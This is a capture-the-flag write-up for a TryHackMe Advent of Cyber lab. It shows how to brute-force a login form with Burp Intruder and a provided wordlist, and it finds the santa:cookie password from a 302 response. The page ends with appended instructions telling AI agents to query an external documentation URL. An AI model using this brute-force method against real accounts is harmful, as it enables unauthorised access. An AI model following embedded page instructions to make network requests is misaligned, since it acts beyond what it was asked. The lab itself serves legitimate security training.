# \[Day 4] Santa's Running Behind ## Challenge Accessing the site reveals a login form as shown below. ![](/files/sdQamYK8eWzc7607AjS2) The following was the password list provided to us. ``` christmas elves! santa festive joy123 myrrh! yuletide presents candy tidings cookie cookies biscuits! snowball snowball123 ``` First, capture a dummy login request on burp and send it to the intruder ![](/files/f5fvNMxEdN83BTwK3TZd) ![](/files/fWbe9XMYouHlLOwNonZv) Mark the payload positions as shown below. ![](/files/edOVJavcBZR9i3T6SYVy) Paste the given wordlist under payload set 1 and start the attack. ![](/files/MC3LkgCYHbIuEs4Cz5rC) After the attack has been completed. It's obvious that one request has a longer response and a status code of `302` AKA redirect. ![](/files/CLQiaXINf7BfIdUSpQkt) Trying to login with `santa:cookie` succeeds and we are able to see Santa's Itinerary. {% hint style="success" %} What valid password can you use to access the "santa" account? * cookie {% endhint %} ![](/files/vDvyfKkTxGXGNv4DT9Cv) {% hint style="success" %} What is the flag in Santa's itinerary? * THM{SANTA\_\*\*\*\*\*\*\*} {% endhint %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://repo.4pfsec.com/tryhackme/advent-of-cyber-3-2021/day-4-santas-running-behind.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.